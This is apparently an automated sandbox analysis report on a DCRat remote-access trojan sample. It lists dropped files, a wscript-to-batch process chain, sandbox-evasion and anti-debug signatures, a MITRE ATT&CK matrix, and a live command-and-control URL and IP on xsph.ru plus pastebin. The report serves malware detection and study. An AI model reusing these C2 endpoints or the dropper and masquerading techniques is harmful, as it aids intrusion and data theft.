            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeMemory allocated: 1070000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeMemory allocated: 1B050000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeMemory allocated: 1750000 memory reserve | memory write watch
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeMemory allocated: 1B270000 memory reserve | memory write watch
            Source: C:\Recovery\csrss.exeMemory allocated: 2BD0000 memory reserve | memory write watch
            Source: C:\Recovery\csrss.exeMemory allocated: 1ABD0000 memory reserve | memory write watch
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 599874Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 599218Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 598999Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 598671Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 922337203685477
            Source: C:\Recovery\csrss.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeWindow / User API: threadDelayed 1255Jump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeWindow / User API: threadDelayed 989Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeWindow / User API: threadDelayed 1176Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeWindow / User API: threadDelayed 2278Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeWindow / User API: threadDelayed 364
            Source: C:\Recovery\csrss.exeWindow / User API: threadDelayed 1030
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exe TID: 7524Thread sleep count: 1255 > 30Jump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exe TID: 7524Thread sleep count: 989 > 30Jump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exe TID: 7500Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe TID: 7932Thread sleep count: 1176 > 30Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe TID: 7952Thread sleep count: 2278 > 30Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe TID: 8128Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe TID: 8128Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe TID: 8128Thread sleep time: -599874s >= -30000sJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe TID: 8128Thread sleep time: -599765s >= -30000sJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe TID: 8128Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe TID: 8128Thread sleep time: -599546s >= -30000sJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe TID: 8128Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe TID: 8128Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe TID: 8128Thread sleep time: -599218s >= -30000sJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe TID: 8128Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe TID: 8128Thread sleep time: -598999s >= -30000sJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe TID: 8128Thread sleep time: -598890s >= -30000sJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe TID: 8128Thread sleep time: -598781s >= -30000sJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe TID: 8128Thread sleep time: -598671s >= -30000sJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe TID: 8128Thread sleep time: -598562s >= -30000sJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe TID: 8108Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe TID: 7868Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe TID: 7960Thread sleep count: 364 > 30
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe TID: 7896Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Recovery\csrss.exe TID: 8088Thread sleep count: 1030 > 30
            Source: C:\Recovery\csrss.exe TID: 8064Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Recovery\csrss.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0037A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0037A5F4
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0038B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0038B8E0
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0038DD72 VirtualQuery,GetSystemInfo,0_2_0038DD72
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 599874Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 599218Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 598999Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 598671Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeThread delayed: delay time: 922337203685477
            Source: C:\Recovery\csrss.exeThread delayed: delay time: 922337203685477
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeFile opened: C:\Users\userJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: wscript.exe, 00000001.00000003.1679503717.000000000256D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Y
            Source: CRf9KBk4ra.exe, 00000000.00000003.1654716696.0000000002852000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: CRf9KBk4ra.exe, 00000000.00000002.1656350477.000000000286D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
            Source: CRf9KBk4ra.exe, 00000000.00000003.1655178522.0000000002853000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: w32tm.exe, 00000010.00000002.1748225529.000001BC001D9000.00000004.00000020.00020000.00000000.sdmp, MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1796150635.000000001C0FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeAPI call chain: ExitProcess graph end nodegraph_0-24478
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0039866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0039866F
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0039753D mov eax, dword ptr fs:[00000030h]0_2_0039753D
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0039B710 GetProcessHeap,0_2_0039B710
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeProcess token adjusted: Debug
            Source: C:\Recovery\csrss.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0038F063 SetUnhandledExceptionFilter,0_2_0038F063
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0038F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0038F22B
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0039866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0039866F
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0038EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0038EF05
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\hyperBrowsermonitorNet\BYhHcZyz.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperBrowsermonitorNet\cyFyzmRWbIwTjqG.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\hyperBrowsermonitorNet\serverwinCommon.exe "C:\hyperBrowsermonitorNet\serverwinCommon.exe"Jump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KPLr9FsY2g.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\csrss.exe "C:\Recovery\csrss.exe" Jump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0038ED5B cpuid 0_2_0038ED5B
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0038A63C
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeQueries volume information: C:\hyperBrowsermonitorNet\serverwinCommon.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeQueries volume information: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe VolumeInformationJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeQueries volume information: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe VolumeInformation
            Source: C:\Recovery\csrss.exeQueries volume information: C:\Recovery\csrss.exe VolumeInformation
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0038D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0038D5D4
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0037ACF5 GetVersionExW,0_2_0037ACF5
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000004.00000002.1697465797.0000000002537000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1797616767.00000000032AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1797616767.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.1829922559.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1697465797.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.1784881543.0000000003051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1698366349.00000000123B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: serverwinCommon.exe PID: 7480, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MImOLbdPzolqACtrpVpcRPdPWZg.exe PID: 7776, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MImOLbdPzolqACtrpVpcRPdPWZg.exe PID: 7800, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 8044, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000004.00000002.1697465797.0000000002537000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1797616767.00000000032AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1797616767.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.1829922559.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1697465797.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.1784881543.0000000003051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1698366349.00000000123B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: serverwinCommon.exe PID: 7480, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MImOLbdPzolqACtrpVpcRPdPWZg.exe PID: 7776, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MImOLbdPzolqACtrpVpcRPdPWZg.exe PID: 7800, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 8044, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting            		Valid Accounts11
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		11
            Process Injection            		221
            Masquerading            		OS Credential Dumping1
            System Time Discovery            		Remote Services11
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		11
            Scripting            		1
            Scheduled Task/Job            		1
            Disable or Modify Tools            		LSASS Memory121
            Security Software Discovery            		Remote Desktop ProtocolData from Removable Media11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		31
            Virtualization/Sandbox Evasion            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive3
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection            		NTDS31
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            Application Window Discovery            		SSHKeylogging14
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Obfuscated Files or Information            		Cached Domain Credentials3
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
            Software Packing            		DCSync37
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583170 Sample: CRf9KBk4ra.exe Startdate: 02/01/2025 Architecture: WINDOWS Score: 100 58 pastebin.com 2->58 60 a1068999.xsph.ru 2->60 66 Suricata IDS alerts for network traffic 2->66 68 Found malware configuration 2->68 70 Malicious sample detected (through community Yara rule) 2->70 74 15 other signatures 2->74 11 CRf9KBk4ra.exe 3 6 2->11         started        14 MImOLbdPzolqACtrpVpcRPdPWZg.exe 14 3 2->14         started        18 MImOLbdPzolqACtrpVpcRPdPWZg.exe 2->18         started        signatures3 72 Connects to a pastebin service (likely for C&C) 58->72 process4 dnsIp5 54 C:\...\serverwinCommon.exe, PE32 11->54 dropped 56 C:\hyperBrowsermonitorNet\BYhHcZyz.vbe, data 11->56 dropped 20 wscript.exe 1 11->20         started        62 a1068999.xsph.ru 141.8.192.164, 49731, 80 SPRINTHOSTRU Russian Federation 14->62 64 pastebin.com 172.67.19.24, 443, 49730 CLOUDFLARENETUS United States 14->64 92 Multi AV Scanner detection for dropped file 14->92 file6 signatures7 process8 signatures9 76 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->76 23 cmd.exe 1 20->23         started        process10 process11 25 serverwinCommon.exe 3 12 23->25         started        29 conhost.exe 23->29         started        file12 46 C:\...\MImOLbdPzolqACtrpVpcRPdPWZg.exe, PE32 25->46 dropped 48 C:\Recovery\csrss.exe, PE32 25->48 dropped 50 C:\Recovery\MImOLbdPzolqACtrpVpcRPdPWZg.exe, PE32 25->50 dropped 52 C:\Users\user\AppData\...\KPLr9FsY2g.bat, DOS 25->52 dropped 84 Antivirus detection for dropped file 25->84 86 Multi AV Scanner detection for dropped file 25->86 88 Machine Learning detection for dropped file 25->88 90 3 other signatures 25->90 31 cmd.exe 1 25->31         started        33 schtasks.exe 25->33         started        35 schtasks.exe 25->35         started        37 7 other processes 25->37 signatures13 process14 process15 39 csrss.exe 31->39         started        42 w32tm.exe 1 31->42         started        44 conhost.exe 31->44         started        signatures16 78 Antivirus detection for dropped file 39->78 80 Multi AV Scanner detection for dropped file 39->80 82 Machine Learning detection for dropped file 39->82

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            CRf9KBk4ra.exe71%ReversingLabsByteCode-MSIL.Trojan.Uztuby
            CRf9KBk4ra.exe58%VirustotalBrowse
            CRf9KBk4ra.exe100%AviraVBS/Runner.VPG
            CRf9KBk4ra.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Recovery\MImOLbdPzolqACtrpVpcRPdPWZg.exe100%AviraHEUR/AGEN.1323984
            C:\hyperBrowsermonitorNet\serverwinCommon.exe100%AviraHEUR/AGEN.1323984
            C:\Users\user\AppData\Local\Temp\KPLr9FsY2g.bat100%AviraBAT/Delbat.C
            C:\Recovery\MImOLbdPzolqACtrpVpcRPdPWZg.exe100%AviraHEUR/AGEN.1323984
            C:\Recovery\csrss.exe100%AviraHEUR/AGEN.1323984
            C:\hyperBrowsermonitorNet\BYhHcZyz.vbe100%AviraVBS/Runner.VPG
            C:\Recovery\MImOLbdPzolqACtrpVpcRPdPWZg.exe100%Joe Sandbox ML
            C:\hyperBrowsermonitorNet\serverwinCommon.exe100%Joe Sandbox ML
            C:\Recovery\MImOLbdPzolqACtrpVpcRPdPWZg.exe100%Joe Sandbox ML
            C:\Recovery\csrss.exe100%Joe Sandbox ML
            C:\Recovery\MImOLbdPzolqACtrpVpcRPdPWZg.exe74%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Recovery\csrss.exe74%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe74%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\hyperBrowsermonitorNet\serverwinCommon.exe74%ReversingLabsByteCode-MSIL.Ransomware.Prometheus

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://a1068999.xsph.ru/L1nc0In.php?dJpokCi4eIn08fwF5fxU0YsMAMpZQ=HlIVmDvSw9kuH3D6DEv6BSc&FEbcnYXInwA=sn2&7f588507da462c66c8d7e4bf263478da=811e4ff91d24acd2ff809d0fba0acc36&c6a8234adf537449ee48f442440ce8cf=wMxMTZzImY1EzMiFmMzYWY1UmY5YjYlNGNlhTZ0IjM2YjY3MTOmdjM&dJpokCi4eIn08fwF5fxU0YsMAMpZQ=HlIVmDvSw9kuH3D6DEv6BSc&FEbcnYXInwA=sn2100%Avira URL Cloudmalware
            https://cp.sprinthost.ru0%Avira URL Cloudsafe
            http://a1068999.xsph.ru100%Avira URL Cloudmalware
            http://a1068999.xsph.ru/100%Avira URL Cloudmalware
            https://index.from.sh/pages/game.html0%Avira URL Cloudsafe
            https://cp.sprinthost.ru/auth/login0%Avira URL Cloudsafe
            http://a1068999.xsph.ru/L1nc0In.php?dJpokCi4eIn08fwF5fxU0YsMAMpZQ=HlIVmDvSw9kuH3D6DEv6BSc&FEbcnYXInw100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            a1068999.xsph.ru
            		141.8.192.164
            		truetrue
              		unknown
              pastebin.com
              		172.67.19.24
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
